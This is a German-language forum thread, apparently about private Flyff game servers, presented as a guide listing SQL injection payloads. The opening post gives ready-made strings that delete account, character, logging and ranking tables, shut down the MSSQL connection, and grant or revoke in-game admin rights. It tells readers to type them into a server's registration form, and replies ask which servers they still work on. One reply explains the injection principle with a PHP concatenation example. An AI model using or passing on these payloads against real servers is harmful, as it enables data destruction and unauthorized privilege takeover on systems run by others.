[Guide]Auflistung der SQL Injections

Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

  • [Guide]Auflistung der SQL Injections

    [FONT="Comic Sans MS"][SIZE="2"][COLOR="LemonChiffon"]Hier stelle ich mal eine kleine Auflistung der mir bisher bekannten Sql-Injections rein!
    [/COLOR][/SIZE][/FONT]


    • Quellcode

      1. ';delete account_tbl;--

      Löscht die Accountdatenbank

    • Quellcode

      1. ';delete character_01_tbl;--

      Löscht die Characterdatenbank

    • Quellcode

      1. ';delete logging_01_tbl;--

      Löscht die Loggdatenbank

    • Quellcode

      1. ';delete ranking_tbl;--

      Löscht die Rankingdatenbank

    • Quellcode

      1. ';shutdown;--

      Schließt die MSSQL Verbindung!

    • Quellcode

      1. USE [CHARACTER_01_DBF]
      3. UPDATE CHARACTER_TBL SET m_chAuthority='Z'
      4. WHERE m_szName='ACCOUNTID' and serverindex='01'
      6. USE [ACCOUNT_DBF]
      8. UPDATE ACCOUNT_TBL_DETAIL SET m_chLoginAuthority='Z'
      9. WHERE account='CHARACTERNAME' and gamecode='A000'


      Gibt deinen Charackter Adminrechte!
      Damit kann man auch einen Admin GM oder sonstiges mit Ingamerrechten die rechte entziehen,mann muss nur jediglich die AccountID und den Characktername wissen und aus em 'Z' ein 'F' machen!


    Wie das funktioniert?

    Einfach den Code bei der Regristrierungsseite eingebe,wo normalerweise deine Accountid rein kommt!


    Ich werde diesen Thread updaten,sobald neue Codes bekannt sind!

    Viel Spaß

    wünscht Frucht

  • Werbung zur Unterstützung des Forums ( Bitte AddBlocker deaktivieren )

  • USE [CHARACTER_01_DBF]

    UPDATE CHARACTER_TBL SET m_chAuthority='Z'
    WHERE m_szName='[COLOR="Red"]ACCOUNTID[/COLOR]' and serverindex='01'

    USE [ACCOUNT_DBF]

    UPDATE ACCOUNT_TBL_DETAIL SET m_chLoginAuthority='Z'
    WHERE account='[COLOR="Red"]CHARACTERNAME[/COLOR]' and gamecode='A000'


    AccounID: Da gibst du deine ID ein , womit du dich ins Spiel einlogst.
    Charaktername: Der Name vom Charakter der die Rechte erhalten soll


    Dann hat dein Flyff Charakter die Adminrechte

  • Foldercarp;69149 schrieb:

    Wie soll das funzen?
    Weil, hat dann der PC Adminrechte oder wie meinst du das,''Deinen Charakter''


    Nein,man gibt das einfach in das Regristrierungsscript ein.

    Dann wird das ausgeführt.

    Und dein Charackter hat entweder Ingamer Rechte.

    Oder Datenbanken werden gelöscht.

    Oder die Verbindung zwischen Mssql bricht ab...

  • Man man Man, da hier einige das Prinzip von SQL Injections nicht verstehen.
    Hier mal ein Beispiel eines auszuführenden SQL Statements:

    SELECT * FROM `accounts` WHERE `username` = '".$_POST['username']."'


    $_POST['username'] ist das was wir in das Textfeld eingegeben und abgeschickt haben.
    Schreiben wir also 'Felix' in das Textfeld so heißt unser SQL Statement

    SELECT * FROM `accounts` WHERE `username` = 'Felix'


    Aber da wir ganz böse Buben sind (und solche coolen "Hacker" wie akira Udo einer ist)
    schreiben wir natürlich nicht unseren Accountnamen
    rein sondern versuchen schön den Server putt zu machen. Also wie geht das? Ganz einfach
    der Coder im ersten Beispiel (das bin ich :D) hat natürlich keine Ahnung von der Materie
    und denkt sich "WTF?!! TAGS MASKIEREN? WASN DAT?" Also schreiben wir in
    unser Textfeld einfach "ich bin ein böser hacker' DELETE `accounts`--;"
    Nun heißt unser SQL Statement so:

    SELECT * FROM `accounts` WHERE `username` = 'ich bin ein böser hacker' DELETE `accounts`--;'


    Was passiert nun? Anstatt das das Script locker fluffig die Daten des ausgewählten
    accounts liest löscht es das account table. Und nein die beiden Minuszeichen (--) sind
    kein "voll str3ng geheimer h4cking c0de" sondern sind ein Kommentar in SQL und
    bewirken was alles was nach unserem DELETE Statement steht igoniert wird.

  • MeMyselfAndI;69139 schrieb:

    Nice.^^

    Auf Inposterum Workt es nicht. Auf Fame auch net. Offi garantiert net xD
    Auf welchen workt es denn? :D

    Hast ein THX ^-^

    LG & Guten Rutsch
    MeMyselfAndI


    Soweit ich weiß hat DD in frühen Zeiten tatsächlich offi FlyFF durch ne Injection drangekriegt... ;)
    (Kann mich aber auch irren... die Gerüchteküche ist nicht zu unterschätzen.)

  • escaPe;69706 schrieb:

    Nice. Hast nen thanks.
    Aber wieso funksen die nicht bei Fame?


    Jz hab ichs schon lang und breit erklärt und du kapiersts immernoch nicht. Bei manchen
    ist echt Hopfen und Malz verloren :%


    Soweit ich weiß hat DD in frühen Zeiten tatsächlich offi FlyFF durch ne Injection drangekriegt... ;)
    (Kann mich aber auch irren... die Gerüchteküche ist nicht zu unterschätzen.)


    Normal würd ich darüber lachen und sagen das kein Team aus professionellen Entwicklern so
    dämlich ist auf Injections nicht achtzugeben. Aber was ich schon alles bei Flyff erlebt hab glaub ich
    dir das sogar.

  • [FONT="Tahoma"][COLOR="DarkOrange"][SIZE="2"]

    h4te;69214 schrieb:

    Man man Man, da hier einige das Prinzip von SQL Injections nicht verstehen.
    Hier mal ein Beispiel eines auszuführenden SQL Statements:



    $_POST['username'] ist das was wir in das Textfeld eingegeben und abgeschickt haben.
    Schreiben wir also 'Felix' in das Textfeld so heißt unser SQL Statement



    Aber da wir ganz böse Buben sind (und solche coolen "Hacker" wie akira Udo einer ist)
    schreiben wir natürlich nicht unseren Accountnamen
    rein sondern versuchen schön den Server putt zu machen. Also wie geht das? Ganz einfach
    der Coder im ersten Beispiel (das bin ich :D) hat natürlich keine Ahnung von der Materie
    und denkt sich "WTF?!! TAGS MASKIEREN? WASN DAT?" Also schreiben wir in
    unser Textfeld einfach "ich bin ein böser hacker' DELETE `accounts`--;"
    Nun heißt unser SQL Statement so:



    Was passiert nun? Anstatt das das Script locker fluffig die Daten des ausgewählten
    accounts liest löscht es das account table. Und nein die beiden Minuszeichen (--) sind
    kein "voll str3ng geheimer h4cking c0de" sondern sind ein Kommentar in SQL und
    bewirken was alles was nach unserem DELETE Statement steht igoniert wird.


    Sonst würde ein Error kommen oder es würde garnicht funzen wegen dem Apostof da hinter oder?    [/SIZE][/COLOR][/FONT]